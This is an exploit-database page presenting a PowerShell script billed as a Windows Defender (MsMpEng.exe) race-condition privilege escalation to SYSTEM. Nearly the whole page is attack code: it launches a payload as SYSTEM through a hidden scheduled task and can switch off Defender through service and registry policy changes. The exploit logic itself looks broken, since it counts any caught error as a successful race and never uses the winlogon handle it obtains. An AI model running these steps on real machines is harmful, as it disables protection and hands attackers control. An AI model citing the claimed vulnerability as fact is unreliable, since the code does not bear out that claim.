Vulners
Lucene search
π Microsoft Windows Defender MsMpEng.exe Race Condition / Privilege Escalation
ποΈΒ 18 Jun 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 21Β Views
==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege
Escalation PowerShell Exploit |
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64
bits) |
| # Vendor : https://www.microsoft.com/
|
==================================================================================================================================
[+] Summary : This PowerShell script demonstrates a local privilege
escalation (LPE) attack targeting a race condition in the Windows Defender
engine (MsMpEng.exe).
[+] POC :
<#
.SYNOPSIS
.\WinDefender_LPE.ps1
.\WinDefender_LPE.ps1 -RaceIterations 200 -DisableDefender
#>
param(
[int]$RaceIterations = 100,
[switch]$DisableDefender,
[switch]$Cleanup,
[string]$PayloadPath = "$env:TEMP\payload.exe"
)
function Write-ColorOutput {
param(
[string]$Message,
[string]$Color = "White"
)
$colors = @{
"SUCCESS" = "Green"
"ERROR" = "Red"
"WARNING" = "Yellow"
"INFO" = "Cyan"
}
$colorName = if ($colors.ContainsKey($Color)) { $colors[$Color] } else
{ $Color }
Write-Host "[$(Get-Date -Format 'HH:mm:ss')] $Message" -ForegroundColor
$colorName
}
function Test-Admin {
$currentUser = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object
Security.Principal.WindowsPrincipal($currentUser)
return
$principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}
function Get-DefenderStatus {
try {
$service = Get-Service -Name WinDefend -ErrorAction Stop
return $service.Status
} catch {
return "Not Found"
}
}
function New-FakeISO {
param([string]$Path)
Write-ColorOutput "Creating fake ISO at $Path" "INFO"
$isoContent = "CD001" * 512
$isoContent += "`0" * 1024
[System.IO.File]::WriteAllBytes($Path,
[System.Text.Encoding]::ASCII.GetBytes($isoContent))
if (Test-Path $Path) {
Write-ColorOutput "Fake ISO created successfully" "SUCCESS"
return $true
}
return $false
}
function Mount-ISO {
param([string]$IsoPath)
Write-ColorOutput "Mounting ISO $IsoPath" "INFO"
try {
$result = Mount-DiskImage -ImagePath $IsoPath -PassThru
-ErrorAction Stop
Write-ColorOutput "ISO mounted successfully" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to mount ISO: $($_.Exception.Message)"
"ERROR"
return $false
}
}
function Dismount-ISO {
param([string]$IsoPath)
try {
Dismount-DiskImage -ImagePath $IsoPath -ErrorAction SilentlyContinue
Write-ColorOutput "ISO unmounted" "INFO"
} catch {
}
}
function Set-RealtimePriority {
Write-ColorOutput "Setting process to REALTIME priority class" "INFO"
try {
$process = Get-Process -Id $pid
$process.PriorityClass =
[System.Diagnostics.ProcessPriorityClass]::RealTime
Write-ColorOutput "Realtime priority set" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to set realtime priority:
$($_.Exception.Message)" "WARNING"
return $false
}
}
function Invoke-RaceCondition {
param([int]$Iterations)
Write-ColorOutput "Triggering race condition with $Iterations
iterations" "INFO"
$successCount = 0
$raceTriggered = $false
for ($i = 0; $i -lt $Iterations; $i++) {
try {
$shadow = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\",
"ClientAccessible")
Start-Process -FilePath "C:\Program Files\Windows
Defender\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle
Hidden -ErrorAction SilentlyContinue
$testFile = "$env:TEMP\race_$i.txt"
"test" | Out-File -FilePath $testFile -ErrorAction
SilentlyContinue
Remove-Item $testFile -ErrorAction SilentlyContinue
$successCount++
if ($i % 10 -eq 0) {
Write-ColorOutput "Race iteration $i/$Iterations completed"
"INFO"
}
} catch {
Write-ColorOutput "RACE TRIGGERED at iteration $i!" "WARNING"
$raceTriggered = $true
break
}
Start-Sleep -Milliseconds 50
}
Write-ColorOutput "Completed $successCount iterations" "INFO"
return $raceTriggered
}
function Disable-DefenderPersistence {
Write-ColorOutput "Disabling Windows Defender persistence..." "WARNING"
try {
Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Disabled -ErrorAction
SilentlyContinue
$regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1
-Force -ErrorAction SilentlyContinue
$rtpPath = "$regPath\Real-Time Protection"
New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring"
-Value 1 -Force -ErrorAction SilentlyContinue
Write-ColorOutput "Windows Defender disabled" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to disable Defender:
$($_.Exception.Message)" "ERROR"
return $false
}
}
function Restore-Defender {
Write-ColorOutput "Restoring Windows Defender..." "INFO"
try {
Remove-ItemProperty -Path
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name
"DisableAntiSpyware" -ErrorAction SilentlyContinue -Force
Set-Service -Name WinDefend -StartupType Automatic -ErrorAction
SilentlyContinue
Start-Service -Name WinDefend -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction
SilentlyContinue
Write-ColorOutput "Windows Defender restored" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to restore Defender:
$($_.Exception.Message)" "WARNING"
return $false
}
}
function Invoke-SystemPayload {
param([string]$PayloadPath)
Write-ColorOutput "Attempting to execute payload as SYSTEM..." "INFO"
try {
# Method 1: Use winlogon token
$winlogon = Get-Process -Name winlogon -ErrorAction Stop
$token = $winlogon.Handle
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = $PayloadPath
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $true
$startInfo.WindowStyle =
[System.Diagnostics.ProcessWindowStyle]::Hidden
[System.Diagnostics.Process]::Start($startInfo) | Out-Null
Write-ColorOutput "Payload executed via winlogon" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Winlogon method failed: $($_.Exception.Message)"
"WARNING"
}
try {
$taskName = "TempTask" +
[System.IO.Path]::GetRandomFileName().Replace('.', '')
schtasks /create /tn $taskName /tr $PayloadPath /sc once /st 00:00
/ru SYSTEM /f | Out-Null
schtasks /run /tn $taskName | Out-Null
Start-Sleep -Seconds 2
schtasks /delete /tn $taskName /f | Out-Null
Write-ColorOutput "Payload executed via scheduled task" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Scheduled task method failed:
$($_.Exception.Message)" "WARNING"
}
Write-ColorOutput "Failed to execute payload as SYSTEM" "ERROR"
return $false
}
function New-TestPayload {
param([string]$Path)
Write-ColorOutput "Creating test payload at $Path" "INFO"
$payload = @'
@echo off
echo [+] Exploit successful! Running as: > %temp%\defender_lpe.txt
whoami >> %temp%\defender_lpe.txt
echo [+] Date: %date% %time% >> %temp%\defender_lpe.txt
calc.exe
'@
[System.IO.File]::WriteAllText($Path, $payload)
return $true
}
function Main {
Write-ColorOutput @"
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Windows Defender MsMpEng.exe Race Condition LPE β
β Local Privilege Escalation to SYSTEM β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
"@ "INFO"
Write-ColorOutput "Target: $env:COMPUTERNAME" "INFO"
Write-ColorOutput "User: $env:USERNAME" "INFO"
if (-not (Test-Admin)) {
Write-ColorOutput "Not running as administrator. Exploit may fail."
"WARNING"
}
$defenderStatus = Get-DefenderStatus
Write-ColorOutput "Windows Defender status: $defenderStatus" "INFO"
if ($defenderStatus -ne "Running") {
Write-ColorOutput "Windows Defender is not running. Exploit may not
work." "ERROR"
return
}
Set-RealtimePriority
$isoPath = "$env:TEMP\fake_$(Get-Random).iso"
if (-not (New-FakeISO -Path $isoPath)) {
Write-ColorOutput "Failed to create fake ISO" "ERROR"
return
}
$mountSuccess = Mount-ISO -IsoPath $isoPath
$raceTriggered = Invoke-RaceCondition -Iterations $RaceIterations
Dismount-ISO -IsoPath $isoPath
Remove-Item $isoPath -Force -ErrorAction SilentlyContinue
$newDefenderStatus = Get-DefenderStatus
if ($newDefenderStatus -ne $defenderStatus) {
Write-ColorOutput "Windows Defender status changed: $defenderStatus
-> $newDefenderStatus" "WARNING"
}
$payloadPath = if ($PayloadPath -and (Test-Path $PayloadPath)) {
$PayloadPath
} else {
$tempPayload = "$env:TEMP\payload_$(Get-Random).exe"
New-TestPayload -Path $tempPayload
$tempPayload
}
if ($raceTriggered) {
Write-ColorOutput "Race condition triggered successfully!" "SUCCESS"
Invoke-SystemPayload -PayloadPath $payloadPath
} else {
Write-ColorOutput "Race condition may not have triggered" "WARNING"
}
if ($DisableDefender) {
Disable-DefenderPersistence
}
if ($Cleanup) {
Restore-Defender
}
Write-ColorOutput "Exploit completed" "INFO"
}
Main
Greetings to
:==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John
Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jun 2026 00:00Current
5.3Medium risk
Vulners AI Score5.3